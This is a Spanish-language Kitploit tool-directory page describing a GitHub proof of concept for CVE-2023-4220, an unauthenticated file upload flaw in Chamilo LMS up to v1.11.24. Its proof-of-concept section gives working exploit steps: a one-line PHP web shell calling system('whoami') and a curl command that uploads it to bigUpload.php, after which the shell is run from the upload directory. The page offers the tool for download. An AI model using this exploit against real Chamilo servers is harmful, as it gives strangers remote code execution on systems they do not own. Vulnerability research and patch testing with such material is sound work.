Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenados y obtener ejecución remota de código mediante la subida de una web shell. | Kitploit
Herramientas/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver RepositorioSitio web
1hace 2 añosAún no revisado

Acerca de

Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenados y obtener ejecución remota de código mediante la subida de una web shell.

Compartir

Chamilo-LMS-Carga-de-Archivos-No-Autenticada-

Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en /main/inc/lib/javascript/bigupload/inc/bigUpload.php en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenado y obtener ejecución remota de código mediante la carga de una web shell.

Versión afectada ≤v1.11.24

Identificador CVE CVE-2023-4220

Resumen de la vulnerabilidad

La funcionalidad de carga de archivos grandes mediante /main/inc/lib/javascript/bigupload/inc/bigUpload.php permite cargar archivos arbitrarios al directorio /main/inc/lib/javascript/bigupload/files dentro de la raíz web.

Prueba de concepto

  • Si el directorio /main/inc/lib/javascript/bigupload/files existe, podemos cargar un archivo arbitrario como;

  • Crear un archivo php malicioso echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Luego podemos cargar este archivo ejecutando el siguiente comando

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Podemos verificar que nuestro archivo fue cargado visitando el directorio /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • Y podemos ejecutarlo haciendo clic en el archivo php, lo que da la salida del comando whoami Untitled (1).png

Descargar herramienta